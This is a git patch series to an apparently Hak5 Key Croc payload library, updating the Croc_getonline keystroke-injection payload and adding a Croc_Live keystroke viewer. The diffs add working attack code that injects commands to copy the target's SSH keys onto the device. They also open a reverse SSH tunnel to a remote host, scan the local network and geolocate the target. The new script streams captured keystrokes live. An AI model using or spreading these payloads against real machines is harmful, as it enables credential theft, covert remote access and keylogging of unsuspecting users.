64f18cf..20782bd 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt @@ -2,7 +2,7 @@ # Description: Attempt to connect Keycroc automatically to target wifi access point # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 4.1 +# Version: 4.2 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro @@ -17,6 +17,7 @@ # getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL # getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET # getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot +# getonline_T <-- MATCH word for Stopping ICMP/PORT alert MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) QUACK LOCK @@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE recon=off recon_loot=/root/udisk/tools/Target_SSID.txt -#---> Edit Linux target password below +alert=off +alert_time=60 + +#---> Edit target password below if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) else - target_password=ENTER_LINUX_PASSWORD_HERE + target_password=ENTER_TARGET_PASSWORD_HERE fi recon_scan() { @@ -53,10 +57,16 @@ recon_scan() { QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 + QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" + QUACK ENTER + QUACK DELAY 2000 elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 + QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :" + QUACK ENTER + QUACK DELAY 2000 else : fi @@ -103,6 +113,14 @@ CLEAN_UP() { fi } +calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" +} + case $LOOT in getonline_W) ENTER_STORAGE @@ -220,6 +238,22 @@ case $LOOT in rm -f $recon_loot root/udisk/config.txt apt -y remove sshpass reboot --force + RESET_PAYLOAD +;; + getonline_T) + if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/port_pid.txt)" + fi + if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then + kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)" + fi + killall -9 tcpdump + sleep 1 + else + : + fi + RESET_PAYLOAD ;; esac sleep 3 @@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then QUACK ENTER elif [ $option -eq 2 ]; then status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" - if [ ! $? = 0 ] || [ ! "$status" = installed ]; then - apt -y install sshpass - else - : - fi + [ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass sleep 1 if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then - cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null - rm -rf ~/.ssh 2>/dev/null - ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa - sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa sleep 1 + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 3 ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip else LED R @@ -324,10 +353,6 @@ else LED R fi -sleep 3 -LED OFF -QUACK UNLOCK - if [ "$recon" = "on" ]; then LED C SLOW echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot @@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot cat /etc/resolv.conf | grep nameserver >> $recon_loot - echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot - calculate_network_range() { - ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') - netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') - IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" - IFS=. read -r m1 m2 m3 m4 <<< "$netmask" - network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" - echo "$network_range" - } perform_nmap_scan() { - local network_range=$1 + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot nmap -T4 -F $network_range >> $recon_loot } - network_range=$(calculate_network_range) - perform_nmap_scan $network_range + calculate_network_range + perform_nmap_scan echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot echo -ne "\n\n" >> $recon_loot - LED OFF elif [ "$recon" = "off" ]; then : else : fi + +if [ "$alert" = "on" ]; then + icmp_alert() { + calculate_network_range + sleep 1 + until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do + : + done + LED R SLOW + iptables -F + iptables -A OUTPUT -p icmp --icmp-type any -j DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + } + port_alert() { + ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-) + file=/tmp/tcpdump.out + until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do + : + done + LED R SLOW + iptables -F + iptables -P INPUT DROP + iptables -P OUTPUT DROP + iptables -P FORWARD DROP + sleep $alert_time + iptables-restore < /root/udisk/tools/firewall-rules-backup.txt + LED B ; sleep 2 ; LED OFF + port_alert & echo -ne $! > /tmp/port_pid.txt + } + iptables-save > /root/udisk/tools/firewall-rules-backup.txt + icmp_alert & echo -ne $! > /tmp/icmp_pid.txt + port_alert & echo -ne $! > /tmp/port_pid.txt + LED B +elif [ "$alert" = "off" ]; then + : +else + : +fi + +sleep 3 +LED OFF +QUACK UNLOCK From 6e08132c37bae501c2eabfa7a7aae71b64f413c3 Mon Sep 17 00:00:00 2001 From: spywill Date: Fri, 28 Jul 2023 06:47:54 -0400 Subject: [PATCH 5/9] Update README.md minor changes --- payloads/library/credentials/Croc_Getonline/README.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/README.md b/payloads/library/credentials/Croc_Getonline/README.md index 4382462..7153625 100644 --- a/payloads/library/credentials/Croc_Getonline/README.md +++ b/payloads/library/credentials/Croc_Getonline/README.md @@ -65,7 +65,12 @@ Editing payload variable options: - This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat. - ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" ) -* **Configuring RECON scan with recon=on andrecon=off** +- **`option=4`** + + - This option will run payload as normal, after a successful connection open default browser and start web page. + - ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org ) + +* **Configuring RECON scan with recon=on and recon=off** The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl. @@ -141,4 +146,4 @@ s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and 11{..} executes the commands between the ellipses on the eleventh line of config.txt. G append the contents of hold space to the pattern space using a newline as a separator. -s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. +s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column. From 3743f48375f0c4ad5cae400bfc795612de93e691 Mon Sep 17 00:00:00 2001 From: spywill Date: Fri, 28 Jul 2023 06:50:39 -0400 Subject: [PATCH 6/9] Update Croc_getonline.txt minor changes added starting default browser on target --- .../Croc_Getonline/Croc_getonline.txt | 68 +++++++++++++++---- 1 file changed, 56 insertions(+), 12 deletions(-) diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt index 20782bd..c80cb60 100644 --- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt +++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt @@ -2,7 +2,7 @@ # Description: Attempt to connect Keycroc automatically to target wifi access point # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 4.2 +# Version: 4.3 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro @@ -19,13 +19,20 @@ # getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot # getonline_T <-- MATCH word for Stopping ICMP/PORT alert -MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) +# option=0 Run payload as normal +# option=1 Run payload as normal, open terminal on target +# option=2 Run payload as normal, start reverse SSH tunnel using SSH +# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT +# option=4 Run payload as normal, open web page + +MATCH getonline+_[A-Z]{1} QUACK LOCK #---> Edit payload option below option=0 keycroc_password=hak5croc wifi_pass=/tools/wifipass.txt +web_page=https://forums.hak5.org/ #---> Edit remote host below remote_user_name=EDIT_REMOTE_USERNAME_HERE @@ -37,10 +44,12 @@ port=7000 known_ssid=EDIT_KNOWN_SSID_HERE known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE -#---> Edit recon scan on/off below +#---> Edit recon scan on/off below & nmap recon=off +nmap_scan="nmap -T4 -F" recon_loot=/root/udisk/tools/Target_SSID.txt +#---> Edit ICMP/PORT alert on/off below & iptables time out alert=off alert_time=60 @@ -57,14 +66,14 @@ recon_scan() { QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 - QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" + QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }" QUACK ENTER QUACK DELAY 2000 elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" QUACK ENTER QUACK DELAY 2000 - QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :" + QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :" QUACK ENTER QUACK DELAY 2000 else @@ -211,31 +220,37 @@ case $LOOT in fi ;; getonline_K) - ifconfig wlan0 down LED R + ifconfig wlan0 down RESET_PAYLOAD ;; getonline_S) ATTACKMODE HID STORAGE + sleep 3 RESET_PAYLOAD ;; getonline_H) ATTACKMODE HID + sleep 3 RESET_PAYLOAD ;; getonline_P) ATTACKMODE HID SERIAL + sleep 3 RESET_PAYLOAD ;; getonline_A) ATTACKMODE HID AUTO_ETHERNET + sleep 3 RESET_PAYLOAD ;; getonline_X) LED R rm -f /root/udisk/payloads/Croc_getonline.txt - rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt + rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt rm -f $recon_loot root/udisk/config.txt + rm -f /root/udisk/tools/firewall-rules-backup.txt + rm -r /root/udisk/tools/Target_SSH_KEY apt -y remove sshpass reboot --force RESET_PAYLOAD @@ -254,6 +269,12 @@ case $LOOT in : fi RESET_PAYLOAD +;; + *) + LED R + sleep 1 + LED OFF + RESET_PAYLOAD ;; esac sleep 3 @@ -285,8 +306,8 @@ if [ "$LOOT" = "getonline_W" ]; then fi sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt +sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf ifconfig wlan0 up @@ -326,7 +347,7 @@ if : >/dev/tcp/8.8.8.8/53; then QUACK ENTER elif [ $option -eq 2 ]; then status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" - [ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass + [ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass sleep 1 if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then [ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa @@ -345,6 +366,29 @@ if : >/dev/tcp/8.8.8.8/53; then LED R sleep 1 fi + elif [ $option -eq 4 ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK GUI d + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Start-Process $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_R" ]; then + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + elif [ "$LOOT" = "getonline_L" ]; then + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "xdg-open $web_page & exit" + QUACK ENTER + fi else LED FINISH fi @@ -364,7 +408,7 @@ if [ "$recon" = "on" ]; then perform_nmap_scan() { echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot - nmap -T4 -F $network_range >> $recon_loot + $nmap_scan $network_range >> $recon_loot } calculate_network_range perform_nmap_scan @@ -382,7 +426,7 @@ if [ "$alert" = "on" ]; then icmp_alert() { calculate_network_range sleep 1 - until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do + until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do : done LED R SLOW From 0eb5e899be8afc789dba3ab42b69dba32d320cb6 Mon Sep 17 00:00:00 2001 From: spywill Date: Tue, 1 Aug 2023 08:22:17 -0400 Subject: [PATCH 7/9] Create croc_live.sh --- .../library/general/Croc_Live/croc_live.sh | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 payloads/library/general/Croc_Live/croc_live.sh diff --git a/payloads/library/general/Croc_Live/croc_live.sh b/payloads/library/general/Croc_Live/croc_live.sh new file mode 100644 index 0000000..6a0a14c --- /dev/null +++ b/payloads/library/general/Croc_Live/croc_live.sh @@ -0,0 +1,19 @@ +#!/bin/bash + +# Title: Croc_Live +# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh ) +# Author: spywill +# Version: 1.0 +# Category: Key Croc + +echo -ne "\n\nPrevious keystrokes:\n\n" +find . -type f -name "croc_char.log" -exec cat {} + + +until [ -f loot/croc_char.log ]; do + echo -ne "Waiting for keyboard activity\033[0K\r" +done +sleep 1 +printf '\033[H\033[2J' + +echo -ne "\n\nLive keystrokes:\n\n" +tail -f loot/croc_char.log From c6a76589da7351dd01a7e32ae2c2cdf38bdb9ab7 Mon Sep 17 00:00:00 2001 From: spywill Date: Tue, 1 Aug 2023 08:24:12 -0400 Subject: [PATCH 8/9] Create README.md --- payloads/library/general/Croc_Live/README.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 payloads/library/general/Croc_Live/README.md diff --git a/payloads/library/general/Croc_Live/README.md b/payloads/library/general/Croc_Live/README.md new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/payloads/library/general/Croc_Live/README.md @@ -0,0 +1 @@ + From bd918cb98e457149fa073c1732e4bc5f2fe4d3cf Mon Sep 17 00:00:00 2001 From: spywill Date: Tue, 1 Aug 2023 08:25:10 -0400 Subject: [PATCH 9/9] Update README.md --- payloads/library/general/Croc_Live/README.md | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/payloads/library/general/Croc_Live/README.md b/payloads/library/general/Croc_Live/README.md index 8b13789..89320fe 100644 --- a/payloads/library/general/Croc_Live/README.md +++ b/payloads/library/general/Croc_Live/README.md @@ -1 +1,29 @@ +# Croc_Live +Script Description: Keyboard Activity Monitor + +The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files. + +- Display Previous Keystrokes: + - The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed. + - It then searches for files named "croc_char.log" within the current directory and its subdirectories. + - All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files. + +- Waiting for Keyboard Activity: + - After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log". + - During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected. + +- Show Live Keystrokes: + - Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds. + - A 1-second pause occurs to allow time for the system to update or log any new keyboard activity. + - The terminal screen is then cleared to prepare for the display of live keystrokes. + - A message is shown to inform users that live keystrokes will be displayed. + - The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time. + +- Usage: + +Place the croc_live.sh file in keycroc tools folder. + +To utilize this script, simply execute it in the terminal environment. Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal. + +Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored.